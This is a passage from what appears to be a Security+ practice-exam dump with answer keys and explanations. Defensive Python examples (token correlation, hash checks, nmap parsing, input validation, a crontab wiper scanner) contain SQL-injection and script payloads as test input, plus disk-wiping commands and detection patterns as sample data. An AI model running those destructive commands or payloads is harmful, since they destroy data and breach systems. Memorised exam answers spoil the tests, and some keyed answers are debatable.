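    {"ts": "2024-06-01T12:02:00", "service": "payroll", "token_id": "tok-1ab", "src_ip": "198.51.100.9", "user": "carol"},
    {"ts": "2024-06-01T12:45:00", "service": "hr",      "token_id": "tok-9f2", "src_ip": "203.0.113.7", "user": "bob"},
]


def _t(s: str) -> datetime:
    return datetime.fromisoformat(s)


def correlate_token_reuse(waf_alerts: list[dict], auth_logs: list[dict],
                          window: timedelta = timedelta(minutes=10)) -> list[dict]:
    """SIEM-style rule: a token present in a WAF alert on one service is then
    presented to a different service within `window`. Also reports whether the
    token had previously been used from another source IP (session theft)."""
    by_token: dict[str, list[dict]] = {}
    for rec in auth_logs:
        by_token.setdefault(rec["token_id"], []).append(rec)

    findings = []
    for alert in waf_alerts:
        t0 = _t(alert["ts"])
        uses = by_token.get(alert["token_id"], [])
        original_ips = {u["src_ip"] for u in uses if _t(u["ts"]) < t0}
        for u in uses:
            t1 = _t(u["ts"])
            if u["service"] != alert["service"] and t0 <= t1 <= t0 + window:
                findings.append({
                    "token_id": alert["token_id"],
                    "user": u["user"],
                    "first_service": alert["service"],
                    "reused_on": u["service"],
                    "seconds_after_alert": int((t1 - t0).total_seconds()),
                    "ip_changed": bool(original_ips) and u["src_ip"] not in original_ips,
                })
    return findings


if __name__ == "__main__":
    for f in correlate_token_reuse(WAF_ALERTS, AUTH_LOGS):
        print(f)
```

The join key is the token itself, which only works if every service logs the SSO session or token identifier (or a stable hash of it); that logging requirement is usually the real work behind such a rule.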
QUESTION 633
An administrator is experiencing issues when trying to upload a support file to a vendor. A pop-up
message reveals that a payment card number was found in the file, and the file upload was
blocked.
Which of the following controls is most likely causing this issue and should be checked FIRST?
A. DLP
B. Firewall rule
C. Content filter
D. MDM
E. Application whitelist
Answer: A
Explanation:
DLP (data loss prevention) uses exact data matching or regular-expression matching. In this case
a regex rule for detecting credit card numbers is actively blocking the upload of the document.
An example regex for an Amex card: ^3[47][0-9]{13}$
QUESTION 634
After returning from a conference, a user's laptop has been operating slower than normal and
overheating, and the fans have been running constantly. During the diagnosis process, an
unknown piece of hardware is found connected to the laptop's motherboard.
Which of the following attack vectors was exploited to install the hardware?
A. Removable media
B. Spear phishing
C. Supply chain
D. Direct access
Answer: D
Explanation:
In a direct-access attack, a person gains physical access to a computer and performs malicious
actions including installing different types of devices to compromise security, like operating
system modifications, software worms, keyloggers or covert listening devices.
A direct access threat vector is when the attacker is able to directly control the targeted system.
This can take place through direct physical contact with the system’s keyboard or may occur
through a remote access connection.
QUESTION 635
Which of the following policies establishes rules to measure third-party work tasks and ensure
deliverables are provided within a specific time line?
A. SLA
B. MOU
C. AUP
D. NDA
Answer: A
QUESTION 636
A customer has reported that an organization's website displayed an image of a smiley face
rather than the expected web page for a short time two days earlier.
A security analyst reviews log entries and sees the following around the time of the incident:
Which of the following is MOST likely occurring?
A. Invalid trust chain
B. Domain hijacking
C. DNS poisoning
D. URL redirection
Answer: C
QUESTION 637
Which of the following in a forensic investigation should be priorities based on the order of
volatility? (Choose two.)
A. Page files
B. Event logs
C. RAM
D. Cache
E. Stored files
F. HDD
Answer: CD
Explanation:
The IETF and the Order of Volatility
The Internet Engineering Task Force (IETF) released a document titled, Guidelines for Evidence
Collection and Archiving. It is also known as RFC 3227. This document explains that the
collection of evidence should start with the most volatile item and end with the least volatile item.
So, according to the IETF, the Order of Volatility is as follows:
1. Registers, Cache
2. Routing Table, ARP Cache, Process Table, Kernel Statistics, Memory
3. Temporary File Systems
4. Disk
5. Remote Logging and Monitoring Data that is Relevant to the System in Question
6. Physical Configuration, Network Topology
7. Archival Media
QUESTION 638
A security forensics analyst is examining a virtual server. The analyst wants to preserve the
present state of the virtual server, including memory contents.
Which of the following backup types should be used?
A. Snapshot
B. Differential
C. Cloud
D. Full
E. Incremental
Answer: A
Explanation:
A snapshot preserves the state and data of a virtual machine at a specific point in time.
The state includes the virtual machine’s power state (for example, powered-on, powered-off,
suspended).
The data includes all of the files that make up the virtual machine. This includes disks, memory,
and other devices, such as virtual network interface cards.
A virtual machine provides several operations for creating and managing snapshots and snapshot
chains. These operations let you create snapshots, revert to any snapshot in the chain, and
remove snapshots. You can create extensive snapshot trees.
QUESTION 639
A security manager needs to assess the security posture of one of the organization's vendors.
The contract with the vendor does not allow for auditing of the vendor's security controls.
Which of the following should the manager request to complete the assessment?
A. A service-level agreement
B. A business partnership agreement
C. A SOC 2 Type 2 report
D. A memorandum of understanding
Answer: C
Explanation:
When the contract rules out auditing the vendor directly, the manager asks for the result of an
audit someone else already performed. A SOC 2 Type 2 report is an independent auditor's
attestation of the vendor's security, availability, processing integrity, confidentiality, and privacy
controls, and of their operating effectiveness over a period of time, so it stands in for the audit the
contract does not allow. An SLA, BPA, or MOU defines obligations; none of them provides evidence
that controls are actually in place.
QUESTION 640
A security monitoring company offers a service that alerts its customers if their credit cards have
been stolen. Which of the following is the MOST likely source of this information?
A. STIX
B. The dark web
C. TAXII
D. Social media
E. PCI
Answer: B
QUESTION 641
Which of the following would MOST likely be identified by a credentialed scan but would be
missed by an uncredentialed scan?
A. Vulnerabilities with a CVSS score greater than 6.9
B. Critical infrastructure vulnerabilities on non-IP protocols
C. CVEs related to non-Microsoft systems such as printers and switches
D. Missing patches for third-party software on Windows workstations and servers
Answer: D
Explanation:
A credentialed scan logs in to each host (with a local or domain account, or an SSH key) and reads
the installed software inventory, patch levels, and configuration from the inside. An uncredentialed
scan sees only what is exposed to the network: open ports, service banners, and vulnerabilities
that can be triggered remotely. Missing patches for third-party software on Windows workstations
and servers rarely change anything visible on the network, so they are found reliably only with
credentials. Uncredentialed findings are still the ones to fix first, since they are what an attacker
sees on arrival; the credentialed scan then fills in what the network view misses, such as an
unpatched PDF reader or Java runtime.
QUESTION 642
Multiple business accounts were compromised a few days after a public website had its
credentials database leaked on the Internet. No business emails were identified in the breach, but
the security team thinks that the list of passwords exposed was later used to compromise
business accounts. Which of the following would mitigate the issue?
A. Complexity requirements
B. Password history
C. Acceptable use policy
D. Shared accounts
Answer: B
Explanation:
A password history policy sets how many unique new passwords a user must go through before an
old password can be reused, which, combined with expiration, forces users onto new passwords on
a regular basis. Of the options given, it best addresses passwords that leaked from another site
and were then tried against business accounts (credential stuffing). The root cause is password
reuse across sites; in practice, screening new passwords against known-breached lists and
requiring MFA are the stronger controls, but they are not among the choices.
QUESTION 643
After gaining access to a dual-homed (i.e., wired and wireless) multifunction device by exploiting
a vulnerability in the device's firmware, a penetration tester then gains shell access on another
networked asset. This technique is an example of:
A. Privilege escalation
B. Footprinting
C. Persistence
D. Pivoting
Answer: D
Explanation:
Pivoting is the act of an attacker using one compromised system as a foothold to reach and
compromise other systems on the network. The dual-homed multifunction device is valuable
precisely because it sits on both the wired and wireless networks, so it bridges the tester from one
into the other.
QUESTION 644
An organization has hired a red team to simulate attacks on its security posture. Which of the
following will the blue team do after detecting an IoC?
A. Reimage the impacted workstations
B. Activate runbooks for incident response
C. Conduct forensics on the compromised system
D. Conduct passive reconnaissance to gather information
Answer: B
Explanation:
An IoC has been detected, so incident response begins. The runbook (or playbook) lays out the
roles and the step-by-step procedure for that incident type; reimaging and forensics are later
steps that the runbook itself sequences.
QUESTION 645
A security analyst was called to Investigate a file received directly from a hardware manufacturer.
The analyst is trying to determine whether the file was modified in transit before installation on the
user's computer. Which of the following can be used to safely assess the file?
A. Check the hash of the installation file
B. Match the file names
C. Verify the URL download location
D. Verify the code-signing certificate
Answer: A
Explanation:
The hardware manufacturer will post the hash of the file publicly, and anyone who receives a
copy of that file can run a checksum on it themselves and compare it to the official
manufacturer-provided checksum. Hashing is almost always the correct answer in these types of
questions. You'll see a lot of GitHub repositories using hashed checksums for verification as well,
and I recently installed Java onto my new computer. Java provided me with a hashed checksum for
the setup executable.
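The check described above, as an added example that is not part of the original question or of any vendor's tooling: it hashes a download in chunks, parses a sha256sum-style checksum list, and compares the two. The installer bytes, the file name installer.bin, and the PUBLISHED_SUMS text are constructed stand-ins for the manufacturer's real file and checksum page.

```python
import hashlib
import hmac
import io

# Constructed stand-in for the installer received from the manufacturer (not a real file).
INSTALLER = b"hypothetical-firmware-installer v1.2.3\n" + bytes(range(256)) * 4
INSTALLER_NAME = "installer.bin"

# Constructed stand-in for the manufacturer's published SHA256SUMS file. In practice this
# is fetched from the vendor's site over HTTPS, not from the same place as the download.
PUBLISHED_SUMS = "\n".join([
    "# SHA256SUMS (constructed sample)",
    f"{hashlib.sha256(INSTALLER).hexdigest()}  {INSTALLER_NAME}",
    "0" * 64 + "  other-package.bin",
]) + "\n"


def sha256_of_stream(stream, chunk_size=64 * 1024):
    """Hash a file-like object in chunks so a multi-gigabyte installer is never read into memory."""
    h = hashlib.sha256()
    for chunk in iter(lambda: stream.read(chunk_size), b""):
        h.update(chunk)
    return h.hexdigest()


def parse_sha256sums(text):
    """Parse 'hexdigest  filename' lines (sha256sum output format) into {filename: digest}."""
    sums = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, name = line.partition(" ")
        name = name.lstrip(" *")  # sha256sum marks binary mode with a leading '*'
        digest = digest.lower()
        if len(digest) != 64 or any(c not in "0123456789abcdef" for c in digest) or not name:
            raise ValueError(f"malformed checksum line: {line!r}")
        sums[name] = digest
    return sums


def verify_download(stream, filename, sums_text):
    """True only if the stream's SHA-256 equals the published digest for filename."""
    expected = parse_sha256sums(sums_text).get(filename)
    if expected is None:
        return False  # no published digest: treat as unverified, never as OK
    actual = sha256_of_stream(stream)
    # Constant-time comparison: not critical for a public hash, but a habit worth keeping.
    return hmac.compare_digest(actual, expected)


def verify_bytes(data, filename, sums_text):
    """Convenience wrapper for in-memory data."""
    return verify_download(io.BytesIO(data), filename, sums_text)


def demo():
    """Verify the genuine file and a copy with one byte flipped in transit."""
    genuine = verify_bytes(INSTALLER, INSTALLER_NAME, PUBLISHED_SUMS)
    tampered_bytes = INSTALLER[:-1] + bytes([INSTALLER[-1] ^ 0x01])
    tampered = verify_bytes(tampered_bytes, INSTALLER_NAME, PUBLISHED_SUMS)
    return genuine, tampered


if __name__ == "__main__":
    print(demo())
```

A matching hash proves only that the file equals what the vendor published; if the vendor's download site and checksum page are compromised together, both change together. That is why a valid signature under the vendor's code-signing certificate (option D) is the stronger check when one is available, and why the checksum should be fetched from a different place than the file.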
QUESTION 646
After a recent security breach, a security analyst reports that several administrative usernames
and passwords are being sent via cleartext across the network to access network devices over
port 23. Which of the following should be implemented so all credentials sent over the network
are encrypted when remotely accessing and configuring network devices?
A. SSH
B. SNMPv3
C. SFTP
D. Telnet
E. FTP
Answer: A
Explanation:
Port 23 (Telnet) and port 22 (SSH) are both used to remotely access and manage systems, but
Telnet does not encrypt the session, so captured traffic, including usernames and passwords,
appears in cleartext, whereas an SSH session is encrypted end to end. After migrating to SSH,
disable the Telnet service on the devices and change the credentials that were already exposed.
SNMPv3 (Simple Network Management Protocol) collects and organizes information about managed
devices (servers, desktops, routers, switches) and, unlike earlier versions, can authenticate and
encrypt, but it is for monitoring and configuration through MIBs, not the interactive login sessions
described here.
SFTP (SSH File Transfer Protocol) transfers files securely over SSH; it is not a remote
configuration shell.
FTP (File Transfer Protocol) transfers files, and does so in cleartext.
QUESTION 647
A security administrator has discovered that workstations on the LAN are becoming infected with
malware. The cause of the infections appears to be users receiving phishing emails that are
bypassing the current email-filtering technology. As a result, users are being tricked into clicking
on malicious URLs, as no internal controls currently exist in the environment to evaluate their
safety. Which of the following would be BEST to implement to address the issue?
A. Forward proxy
B. HIDS
C. Awareness training
D. A jump server
E. IPS
Answer: A
Explanation:
The gap described is that nothing in the environment evaluates a URL before the user's browser
reaches it. A forward proxy sits between the workstations and the Internet and can apply URL
filtering and reputation checks, blocking the malicious link at the moment the user clicks it. A
HIDS only detects activity on a host after the malware has already arrived, awareness training
reduces but does not stop clicks, a jump server is for administrative access to servers, and an
IPS matches traffic against attack signatures rather than judging where a link leads.
QUESTION 648
Which of the following are common VoIP-associated vulnerabilities? (Choose two.)
A. SPIM
B. Vishing
C. Hopping
D. Phishing
E. Credential harvesting
F. Tailgating
Answer: BE
Explanation:
Vishing is phishing over voice (VoIP) calls. The scammer typically spoofs caller ID so the call
appears to come from a legitimate source, then tries to talk the target into giving up sensitive
information such as passwords, internal network details, or bank details.
Credential harvesting over VoIP commonly arrives as a fake voicemail-to-email notification whose
link leads to a credential-harvesting page.
SPIM (spam over instant messaging), generic phishing, and tailgating are not VoIP-specific, and
VLAN hopping is a switching attack rather than a VoIP vulnerability.
https://fitsmallbusiness.com/voip-security-threats/
https://www.avanan.com/blog/hello-this-is-credential-harvesting-calling
QUESTION 649
A customer service representative reported an unusual text message that was sent to the help
desk. The message contained an unrecognized invoice number with a large balance due and a
link to click for more details. Which of the following BEST describes this technique?
A. Vishing
B. Whaling
C. Phishing
D. Smishing
Answer: D
Explanation:
Pretty straightforward. Smishing, a portmanteau of SMS and phishing, is a specific type of
phishing done via text messaging, and it's commonly used to orchestrate invoice scams or
otherwise harvest credentials.
QUESTION 650
A security manager has tasked the security operations center with locating all web servers that
respond to an unsecure protocol.
Which of the following commands could an analyst run to find requested servers?
A. nslookup 10.10.10.0
B. nmap -p 80 10.10.10.0/24
C. pathping 10.10.10.0 -p 80
D. nc -l -p 80
Answer: B
Explanation:
nmap -p 80 10.10.10.0/24: Nmap (network mapper) is a network discovery and security auditing
tool used to find hosts, open ports, and services. This command probes every address in the
10.10.10.0/24 range for TCP port 80, the default port for unencrypted HTTP, and lists the hosts
that answer. In practice, also scan the common alternative HTTP ports such as 8080 and 8000, and
treat a port-80 listener that only redirects to HTTPS differently from one that serves content.
nslookup 10.10.10.0 queries DNS (here a reverse lookup of a single address); it says nothing about
listening services.
pathping reports latency and packet loss at each hop between a source and a destination; it is a
troubleshooting tool, not a scanner.
nc -l -p 80 starts a netcat listener on port 80 on the local machine; it does not probe anything.
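The follow-up step after the scan, as an added example that is not part of the original question: parse nmap's grepable output (the -oG format) and list the hosts answering on a given TCP port, so the same parser finds both the port-80 web servers of this question and any device still answering Telnet on port 23 (question 646). The scan output below is a constructed sample, not a real capture; only the three open/closed states and host names in it are invented.

```python
import ipaddress
from collections import defaultdict

# Constructed sample of "nmap -p 23,80,443 -oG - 10.10.10.0/24" output; not a real scan.
SAMPLE_GNMAP = """# Nmap 7.94 scan initiated (constructed sample)
Host: 10.10.10.5 ()\tStatus: Up
Host: 10.10.10.5 ()\tPorts: 23/closed/tcp//telnet///, 80/open/tcp//http///, 443/open/tcp//https///
Host: 10.10.10.7 ()\tStatus: Up
Host: 10.10.10.7 ()\tPorts: 23/closed/tcp//telnet///, 80/closed/tcp//http///, 443/open/tcp//https///
Host: 10.10.10.9 (printer.lab.example)\tStatus: Up
Host: 10.10.10.9 (printer.lab.example)\tPorts: 23/open/tcp//telnet///, 80/open/tcp//http///, 443/closed/tcp//https///
# Nmap done: 256 IP addresses (3 hosts up)
"""


def parse_gnmap(text):
    """Return {ip: {port: service}} for every open TCP port in grepable nmap output.

    Each Ports: entry has the form port/state/protocol/owner/service/rpcinfo/version/,
    so splitting on '/' gives the fields positionally.
    """
    results = defaultdict(dict)
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue  # comment lines and the trailer
        fields = line.split("\t")
        ip = fields[0].split()[1]
        for field in fields[1:]:
            if not field.startswith("Ports:"):
                continue  # "Status:" and "Ignored State:" fields carry no port data
            for entry in field[len("Ports:"):].split(","):
                parts = entry.strip().split("/")
                if len(parts) < 5:
                    continue
                port, state, proto, _owner, service = parts[:5]
                if state == "open" and proto == "tcp":
                    results[ip][int(port)] = service
    return dict(results)


def hosts_with_open_port(text, port):
    """IPs answering on the given TCP port, sorted numerically rather than as strings."""
    hits = [ip for ip, ports in parse_gnmap(text).items() if port in ports]
    return sorted(hits, key=ipaddress.ip_address)


if __name__ == "__main__":
    print("HTTP on 80:", hosts_with_open_port(SAMPLE_GNMAP, 80))
    print("Telnet on 23:", hosts_with_open_port(SAMPLE_GNMAP, 23))
```

Sorting with ipaddress.ip_address matters once a range has more than nine hosts, since string order would put 10.10.10.10 before 10.10.10.2.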
QUESTION 651
Which of the following would detect intrusions at the perimeter of an airport?
A. Signage
B. Fencing
C. Motion sensors
D. Lighting
E. Bollards
Answer: B
Explanation:
The question asks for detection at a perimeter, and there is a class of intrusion detection system
mounted on fences for exactly this purpose: a perimeter intrusion detection system (PIDS). PIDS
sensors are attached to the fence and raise an alarm when someone attempts to climb or cut it.
Motion sensors also detect movement, but on an open airport perimeter they generate many false
alarms because they cannot tell an intruder from an authorized employee, wildlife, or weather. A
PIDS alarms only on climbing or cutting, actions that are very likely to be intrusion attempts.
Signage, lighting, and bollards deter or obstruct; they do not detect.
QUESTION 652
A cloud service provider has created an environment where customers can connect existing local
networks to the cloud for additional computing resources and block internal HR applications from
reaching the cloud. Which of the following cloud models is being used?
A. Public
B. Community
C. Hybrid
D. Private
Answer: C
Explanation:
Hybrid cloud, because on-premises networks and cloud resources are combined, with policy
deciding which workloads (here, the HR applications) stay local.
Private cloud: infrastructure set up for and used by a single organization.
Community cloud: infrastructure shared by organizations with common requirements, such as
several banks sharing a platform built for banking regulations, which spreads the cost across the
members.
Hybrid cloud: a mix in which computing, storage, and applications run both on premises and in the
cloud, possibly using more than one cloud provider. Most organizations are hybrid.
Public cloud: services offered to the general public, for example Google Drive, Microsoft Azure, and
Amazon Web Services.
QUESTION 653
Developers are about to release a financial application, but the number of fields on the forms that
could be abused by an attacker is troubling.
Which of the following techniques should be used to address this vulnerability?
A. Implement input validation
B. Encrypt data before submission
C. Perform a manual review
D. Conduct a peer review session
Answer: A
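What input validation looks like for such a form, as an added example that is not part of the original question or of any real application: every field is checked against an allow-list of the exact shape the business needs, money is handled as Decimal rather than float, and fields the form did not declare are rejected rather than silently bound. The field names, account-number format, and currency set are hypothetical.

```python
import re
from decimal import Decimal

# Allow-list patterns: each field accepts exactly the shape the business needs, nothing else.
AMOUNT_RE = re.compile(r"\d{1,9}(\.\d{1,2})?")     # up to 999999999.99; no sign, no exponent
ACCOUNT_RE = re.compile(r"[0-9]{8,12}")            # hypothetical internal account-number format
MEMO_RE = re.compile(r"[A-Za-z0-9 .,'-]{0,60}")     # free text without < > ; quotes or control chars
CURRENCIES = {"USD", "EUR", "GBP"}                 # hypothetical set supported by the application
EXPECTED_FIELDS = {"amount", "currency", "to_account", "memo"}
MAX_AMOUNT = Decimal("1000000.00")


def validate_transfer(form):
    """Validate a transfer form.

    Returns (cleaned, errors). cleaned holds typed, normalized values and is only safe to
    use when errors is empty; errors maps field name (or "_form") to a short reason.
    """
    cleaned, errors = {}, {}

    # Unknown fields are rejected rather than ignored: a mass-assignment style attack adds
    # fields such as "role" or "fee_waived" hoping the backend binds them to the model.
    form_errors = []
    extra = set(form) - EXPECTED_FIELDS
    if extra:
        form_errors.append(f"unexpected fields: {sorted(extra)}")
    missing = EXPECTED_FIELDS - set(form)
    if missing:
        form_errors.append(f"missing fields: {sorted(missing)}")
    if form_errors:
        errors["_form"] = "; ".join(form_errors)

    amount = str(form.get("amount", "")).strip()
    if not AMOUNT_RE.fullmatch(amount):
        errors["amount"] = "must be digits with at most two decimals"
    else:
        value = Decimal(amount)  # Decimal, never float, for money
        if value <= 0 or value > MAX_AMOUNT:
            errors["amount"] = "out of range"
        else:
            cleaned["amount"] = value

    currency = str(form.get("currency", "")).strip().upper()
    if currency not in CURRENCIES:
        errors["currency"] = "unsupported currency"
    else:
        cleaned["currency"] = currency

    account = str(form.get("to_account", "")).strip()
    if not ACCOUNT_RE.fullmatch(account):
        errors["to_account"] = "must be 8-12 digits"
    else:
        cleaned["to_account"] = account

    memo = str(form.get("memo", "")).strip()
    if not MEMO_RE.fullmatch(memo):
        errors["memo"] = "contains characters outside the allowed set"
    else:
        cleaned["memo"] = memo

    return cleaned, errors


if __name__ == "__main__":
    hostile = {"amount": "100 OR 1=1", "currency": "USD",
               "to_account": "1234'; DROP TABLE accounts;--",
               "memo": "<script>alert(1)</script>", "fee_waived": "true"}
    print(validate_transfer(hostile)[1])
```

Validation here is server-side and uses fullmatch so a pattern cannot be satisfied by a valid prefix; client-side checks are a usability aid only. Validation also does not replace parameterized queries or output encoding, which must still be in place on the database and rendering side.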
QUESTION 654
A research company discovered that an unauthorized piece of software has been detected on a
small number of machines in its lab. The researchers collaborate with other machines using port
445 and on the Internet using port 443. The unauthorized software is starting to be seen on
additional machines outside of the lab and is making outbound communications using HTTPS
and SMB. The security team has been instructed to resolve the problem as quickly as possible
causing minimal disruption to the researchers.
Which of the following contains the BEST course of action in this scenario?
A. Update the host firewalls to block outbound SMB.
B. Place the machines with the unapproved software in containment.
C. Place the unauthorized application in a blocklist.
D. Implement a content filter to block the unauthorized software communication.
Answer: C
Explanation:
Adding the unauthorized application to an application-control blocklist stops it from running on
every managed machine, including the ones outside the lab, while SMB (port 445) and HTTPS (port
443) keep working for the researchers. Blocking outbound SMB, isolating the machines, or filtering
the traffic would all disrupt the legitimate collaboration that uses those same ports.
QUESTION 655
Due to unexpected circumstances, an IT company must vacate its main office, forcing all
operations to alternate, off-site locations.
Which of the following will the company MOST likely reference for guidance during this change?
A. The business continuity plan
B. The retention policy
C. The disaster recovery plan
D. The incident response plan
Answer: A
Explanation:
The business continuity plan is to empower an organization to keep crucial functions running
during downtime. This, in turn, helps the organization respond quickly to an interruption, while
creating resilient operational protocols.
QUESTION 656
A DBA reports that several production server hard drives were wiped over the weekend. The DBA
also reports that several Linux servers were unavailable due to system files being deleted
unexpectedly. A security analyst verified that software was configured to delete data deliberately
from those servers. No backdoors to any servers were found. Which of the following attacks was
MOST likely used to cause the data loss?
A. Logic bomb
B. Ransomware
C. Fileless virus
D. Remote access Trojan
E. Rootkit
Answer: A
Explanation:
The key phrase is "software was configured to delete data deliberately from those servers": a
logic bomb is code that waits for a condition (here, a weekend time) before running its payload. On
Linux this can be as simple as a cron job scheduled to run rm or dd on Saturday night. Ransomware
would encrypt rather than delete and demand payment; a RAT or rootkit would imply remote access
or hidden persistence, and no backdoor was found.
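A check an analyst could run for the cron-job variant, as an added example that is not part of the original question: it parses a system crontab and flags entries whose command matches a destructive pattern, noting whether the schedule falls on a weekend. The crontab text is a constructed sample; the patterns are a starting point, not a complete catalog.

```python
import re

# Constructed sample in /etc/crontab format (m h dom mon dow user command); not from a real host.
SAMPLE_CRONTAB = """# constructed sample, not from a real host
SHELL=/bin/sh
PATH=/usr/sbin:/usr/bin:/sbin:/bin
0 2 * * *   root   /usr/sbin/logrotate /etc/logrotate.conf
30 3 * * 0  root   /usr/local/bin/backup.sh --full
15 1 * * 6  root   /bin/sh -c "rm -rf /var/lib/postgresql/*"
45 1 * * 6  root   dd if=/dev/zero of=/dev/sda bs=1M
*/5 * * * * www    /usr/bin/python3 /opt/app/health.py
"""

# Command shapes that destroy data; each pattern carries the reason reported to the analyst.
DESTRUCTIVE = [
    (re.compile(r"\brm\s+(-[A-Za-z]*[rR][A-Za-z]*\s+)+"), "recursive rm"),
    (re.compile(r"\b(shred|wipefs|mkfs(\.\w+)?)\b"), "disk wipe or format tool"),
    (re.compile(r"\bdd\b.*\bof=/dev/"), "dd writing directly to a block device"),
    (re.compile(r"\bfind\b.*\s-delete\b"), "find with -delete"),
    (re.compile(r">\s*/dev/[sh]d[a-z]"), "shell redirect onto a disk device"),
]
WEEKEND_DOW = {"0", "6", "7"}  # cron accepts both 0 and 7 for Sunday


def scan_crontab(text):
    """Return one finding per cron entry whose command matches a destructive pattern."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#") or re.fullmatch(r"\w+=.*", line):
            continue  # blank line, comment, or environment assignment such as SHELL=/bin/sh
        parts = line.split(None, 6)
        if len(parts) < 7:
            continue  # not a complete "m h dom mon dow user command" line
        minute, hour, dom, mon, dow, user, command = parts
        reasons = [why for pattern, why in DESTRUCTIVE if pattern.search(command)]
        if reasons:
            findings.append({
                "line": lineno,
                "schedule": " ".join((minute, hour, dom, mon, dow)),
                "weekend": dow in WEEKEND_DOW,
                "user": user,
                "command": command,
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB):
        flag = "WEEKEND " if f["weekend"] else ""
        print(f"line {f['line']}: {flag}{f['user']} {f['schedule']} -> {f['command']}  [{', '.join(f['reasons'])}]")
```

Per-user crontabs (/var/spool/cron), /etc/cron.d, at jobs, and systemd timers need the same review, and a logic bomb can just as easily hide in an application's own scheduler or in a script that the legitimate backup job calls.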
QUESTION 657
Digital signatures use asymmetric encryption. This means the message is encrypted with:
A. the sender's private key and decrypted with the sender's public key.
B. the sender's public key and decrypted with the sender's private key.
C. the sender's private key and decrypted with the recipient's public key.
D. the sender's public key and decrypted with the recipient's private key.
Answer: A
Explanation:
A digital signature is produced with the sender's private key and checked with the sender's public
key. In practice the sender hashes the message and encrypts (signs) the hash with the private key;
the receiver decrypts the signature with the sender's public key and compares the result with a
hash of the received message. A match proves the message came from the holder of the private key
and was not altered. The recipient's keys are not involved at all, which is what distinguishes
signing from encrypting for confidentiality.
https://docs.huihoo.com/globus/gt4-tutorial/ch09s03.html
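The sign-with-private, verify-with-public flow carried through in code, as an added example that is not part of the original question: textbook RSA over two tiny primes so every number is visible, signing the SHA-256 digest of a message and then verifying it. The key material, message, and the reduction of the digest into the modulus are toy choices for illustration; real signatures use 2048-bit or larger keys with PSS or PKCS#1 v1.5 padding.

```python
import hashlib

# Toy textbook RSA key from two tiny primes so the arithmetic is visible. Never use
# this key material or this unpadded scheme outside a demonstration.
P, Q = 61, 53
N = P * Q                     # modulus, shared by both keys (3233)
PHI = (P - 1) * (Q - 1)       # Euler's totient (3120)
E = 17                        # public exponent
D = pow(E, -1, PHI)           # private exponent: modular inverse of E (2753)
PUBLIC_KEY = (N, E)
PRIVATE_KEY = (N, D)


def digest(message: bytes, n: int) -> int:
    """Hash the message and reduce it into the modulus (real schemes pad instead of reducing)."""
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % n


def sign(message: bytes, private_key) -> int:
    """Signing: the sender 'encrypts' the message digest with the private key."""
    n, d = private_key
    return pow(digest(message, n), d, n)


def verify(message: bytes, signature: int, public_key) -> bool:
    """Verifying: anyone holding the public key 'decrypts' the signature and compares digests."""
    n, e = public_key
    return pow(signature, e, n) == digest(message, n)


def demo():
    """Sign one message, then check the genuine signature and one altered in transit."""
    message = b"transfer 100 to account 123456789012"
    sig = sign(message, PRIVATE_KEY)
    genuine_ok = verify(message, sig, PUBLIC_KEY)
    # Changing even one unit of the signature changes the recovered digest, because
    # x -> x^e mod n is a bijection, so verification must fail.
    altered_sig_ok = verify(message, (sig + 1) % N, PUBLIC_KEY)
    return genuine_ok, altered_sig_ok


if __name__ == "__main__":
    print("d =", D, "demo:", demo())
```

Note which key appears where: only PRIVATE_KEY is needed to sign and only PUBLIC_KEY to verify, so a verifier never needs to hold a secret, and a changed message fails the same way as a changed signature because its digest no longer matches what the public key recovers.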
QUESTION 658
A help desk technician receives a phone call from someone claiming to be a part of the
organizations cybersecurity incident response team. The caller asks the technician to verify
networks internal firewall IP address. Which of the following is the technicians BEST course of
action?
A. Direct the caller to stop by the help desk in person and hang up, declining any further requests
from the caller.
B. Ask for the caller's name, verify the person's identity in the email directory, and provide the
requested information over the phone.
C. Write down the phone number of the caller if possible and the name of the person requesting the
information, hang up, and notify the organization's cybersecurity officer.
D. Request the caller send an email for identity verification and provide the requested information
via email to the caller.
Answer: C
Explanation:
The help desk technician should treat this as a probable social-engineering attempt: a help desk
technician would not normally hold the internal firewall's address, and a genuine member of the
incident response team would already have it or know whom to ask. A name found in the email
directory proves nothing, since the caller can look names up too, and a follow-up email can be
spoofed just as easily as a phone number.
The safest course is to collect as much information as possible (number, name, what was asked),
hang up, and hand verification to the cybersecurity officer. Even in the unlikely case that the
request is legitimate, the information should come from the security officer, not from a technician
over the phone.
QUESTION 659
An employee received a word processing file that was delivered as an email attachment. The
subject line and email content enticed the employee to open the attachment.
Which of the following attack vectors BEST matches this malware?
A. Embedded Python code
B. Macro-enabled file
C. Bash scripting
D. Credential-harvesting website
Answer: B
Explanation:
Phishing emails with a word-processing attachment typically rely on macros, scripts embedded in
the document that run inside the office application. Macros are intended to automate repetitive
tasks, but they can execute arbitrary code, so a malicious macro can drop or download further
malware, infect other files, or launch a PowerShell stager.
Macros once ran as soon as a document was opened. Office applications now disable macros by
default and, since 2022, block them outright in files that carry the Mark of the Web (downloaded
from the Internet or received as attachments), so the victim has to be talked into unblocking the
file and enabling content. That is what the enticing subject line and body are for.
QUESTION 660
Which of the following is the BEST example of a cost-effective physical control to enforce a USB
removable media restriction policy?
A. Putting security/antitamper tape over USB ports, logging the port numbers, and regularly
inspecting the ports
B. Implementing a GPO that restricts access to authorized USB removable media and regularly
verifying that it is enforced
C. Placing systems into locked, key-controlled containers with no access to the USB ports
D. Installing an endpoint agent to detect connectivity of USB and removable media
Answer: B
Explanation:
Strictly speaking a Group Policy Object is a technical control rather than a physical one, but it is
the most effective and cheapest option offered: the Removable Storage Access policies (Computer
Configuration > Administrative Templates > System > Removable Storage Access) ship with
Windows, so there is no extra cost, and they block reads and writes to USB storage on every
domain-joined machine rather than merely making tampering visible. Tamper tape with periodic
inspection (A) is cheap but only detects, locked enclosures (C) are expensive and impractical, and
an endpoint agent (D) detects connections but does not block them on its own.
QUESTION 661
The SOC for a large MSSP is in a meeting to discuss the lessons learned from a recent incident
that took much too long to resolve. This type of incident has become more common over recent
weeks and is consuming large amounts of the analysts' time due to manual tasks being performed.
Which of the following solutions should the SOC consider to BEST improve its response time?
A. Configure a NIDS appliance using a Switched Port Analyzer
B. Collect OSINT and catalog the artifacts in a central repository
C. Implement a SOAR with customizable playbooks
